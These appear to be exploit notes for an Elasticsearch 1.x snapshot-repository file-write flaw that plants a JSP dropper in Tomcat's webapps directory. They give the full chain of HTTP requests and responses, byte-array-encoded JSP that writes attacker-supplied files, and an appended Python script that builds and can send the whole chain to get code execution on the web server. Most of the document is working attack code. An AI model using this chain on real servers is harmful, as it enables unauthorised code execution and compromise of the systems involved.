[Notes] Exploiting the Elasticsearch file-write vulnerability

Preface

Exploiting the Elasticsearch file-write vulnerability. The idea: put JSP code in an index field name, register an fs snapshot repository whose location is Tomcat's webapps directory, then take a snapshot. The snapshot serialises the index mapping, field name included, into files whose names end in the snapshot name, so with a snapshot named x.jsp Tomcat compiles the result as a JSP.

exp

  1. The file content to write

The JSP goes in as the field name of the document. Strings inside it are spelled out as Java byte arrays rather than quoted literals, because the field name is serialised into the snapshot as a JSON string and a literal double quote would come out escaped as \" and break the JSP:

47, 116, 101, 115, 116, 46, 106, 115, 112: "/test.jsp", the name of the file to be created
114, 119: "rw", the RandomAccessFile mode
120: "x", the name of the request parameter that carries the content
request

POST http://127.0.0.1:9200/x.jsp/x.jsp/1
Content-Type: application/json

{
"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47, 116, 101, 115, 116, 46, 106, 115, 112})), new String(new byte[]{114, 119})).write(request.getParameter(new String(new byte[]{120})).getBytes());%>": "x"
}

response

{"_index": "x.jsp", "_type": "x.jsp", "_id": "1", "_version": 1, "created": true}
  2. Register a snapshot repository located in the Tomcat webapps directory /usr/local/tomcat/webapps

Nothing is written yet; this only tells Elasticsearch where the snapshot files will go. The chain works because this version accepts any path for an fs repository; later versions only accept locations under the directories listed in path.repo, which is what closes this off.

request

PUT http://127.0.0.1:9200/_snapshot/x.jsp
Content-Type: application/json

{
"type": "fs",
"settings": {
"location": "/usr/local/tomcat/webapps",
"compress": false
}
}

response

{"acknowledged":true}
  3. Create the snapshot (this is the step that writes the files)

request

PUT http://127.0.0.1:9200/_snapshot/x.jsp/x.jsp
Content-Type: application/json

{
"indices": "x.jsp",
"ignore_unavailable": true,
"include_global_state": false
}

response

{"accepted": true}

"accepted" only means the snapshot was queued; the files appear once it completes. Adding ?wait_for_completion=true to the PUT makes the call return only after the snapshot is done.

Exploitation

  • Request the snapshot file through Tomcat. Tomcat compiles it as a JSP, the dropper in the field name runs, and the file is created in the current directory (the context root the snapshot file was served from) with the content supplied in the parameter.

x: the parameter name defined in the exp
<jsp>: the file content, normally JSP code; URL-encode it

request

GET http://127.0.0.1:8080/x.jsp/snapshot-x.jsp?x=<jsp>

  • Request the JSP that was just written.

test.jsp: the file name defined in the exp. application.getRealPath resolves against the context that served the snapshot file, so if that is not the ROOT context the file sits under that context's path instead.

request

GET http://127.0.0.1:8080/test.jsp

Done
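The whole chain as one script, an added example that is not code from the original note or from xiaodisec. It assumes the note's addresses and names (Elasticsearch at http://127.0.0.1:9200, Tomcat at http://127.0.0.1:8080, webapps at /usr/local/tomcat/webapps, index/type/repository/snapshot all called x.jsp) and an Elasticsearch 1.x node that accepts an fs repository at any path; the helper names (as_java_bytes, java_bytes_to_str, jsp_dropper, build_chain, trigger_url, run_chain) are this example's own. It builds the byte-array form of the JSP from plain strings, so the numbers in the note can be checked or changed, and it sends nothing unless run_chain() is called.

```python
"""Build, and optionally send, the Elasticsearch snapshot file-write chain.

Added example, not from the original note. Assumes an Elasticsearch 1.x node
that accepts "fs" repositories at arbitrary paths, Tomcat webapps at
/usr/local/tomcat/webapps, and the note's names (everything "x.jsp").
"""
import json
import urllib.parse
import urllib.request
from typing import List, Tuple

ES = "http://127.0.0.1:9200"           # from the note
TOMCAT = "http://127.0.0.1:8080"       # from the note
WEBAPPS = "/usr/local/tomcat/webapps"  # repository location from the note

Request = Tuple[str, str, dict]        # (method, url, json body)


def as_java_bytes(s: str) -> str:
    """Render an ASCII string as a Java expression that rebuilds it from a byte
    array, e.g. "rw" -> 'new String(new byte[]{114, 119})'. The JSP lives in a
    JSON mapping field name; a literal double quote there would be written to
    the snapshot file as \\" and break the code, so the payload contains none."""
    if not s.isascii():
        raise ValueError("only ASCII survives a Java byte[] literal intact")
    return "new String(new byte[]{%s})" % ", ".join(str(b) for b in s.encode("ascii"))


def java_bytes_to_str(arr: str) -> str:
    """Decode a byte list such as "47, 116, 101" back to text (to read payloads)."""
    return bytes(int(x) for x in arr.split(",")).decode("ascii")


def jsp_dropper(target_path: str = "/test.jsp", param: str = "x") -> str:
    """The field name. Once Tomcat compiles the snapshot file as a JSP, this
    writes the `param` request parameter to `target_path` under the context
    root, opening it with RandomAccessFile in "rw" mode."""
    return (
        f"<%new java.io.RandomAccessFile(application.getRealPath({as_java_bytes(target_path)}), "
        f"{as_java_bytes('rw')}).write(request.getParameter({as_java_bytes(param)}).getBytes());%>"
    )


def build_chain(es: str = ES, name: str = "x.jsp", webapps: str = WEBAPPS) -> List[Request]:
    """The three Elasticsearch calls of the note, in order:
    1. index a document whose only field name is the JSP (the mapping is what
       the snapshot serialises, so the name is written out verbatim);
    2. register an fs repository located in Tomcat's webapps directory;
    3. snapshot the index into it, producing files whose names end in `name`,
       i.e. ".jsp", which Tomcat therefore compiles."""
    return [
        ("POST", f"{es}/{name}/{name}/1", {jsp_dropper(): "x"}),
        ("PUT", f"{es}/_snapshot/{name}",
         {"type": "fs", "settings": {"location": webapps, "compress": False}}),
        ("PUT", f"{es}/_snapshot/{name}/{name}",
         {"indices": name, "ignore_unavailable": True, "include_global_state": False}),
    ]


def trigger_url(jsp_code: str, tomcat: str = TOMCAT, name: str = "x.jsp", param: str = "x") -> str:
    """GET that runs the dropper; the JSP to drop travels URL-encoded in `param`.
    The path copies the note; the exact file name and directory depend on the
    repository layout of the Elasticsearch version, so check what was written."""
    return f"{tomcat}/{name}/snapshot-{name}?{urllib.parse.urlencode({param: jsp_code})}"


def run_chain(chain: List[Request], timeout: float = 10.0) -> List[dict]:
    """Send each request in order and return the parsed JSON replies. urlopen
    raises on 4xx/5xx, so a failed step stops the chain instead of hiding it."""
    replies = []
    for method, url, body in chain:
        req = urllib.request.Request(
            url, data=json.dumps(body).encode(), method=method,
            headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            replies.append(json.loads(resp.read().decode()))
    return replies


if __name__ == "__main__":
    for method, url, body in build_chain():
        print(method, url, json.dumps(body))
    print(trigger_url('<%out.println("ok");%>'))
```

run_chain(build_chain()) performs the three calls; afterwards fetch trigger_url(your_jsp) and then the dropped file. List what the snapshot actually wrote under webapps before requesting it, since the file layout differs between Elasticsearch versions, and remember that the dropped file lands under the context that served the snapshot file.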

References

Bilibili: xiaodisec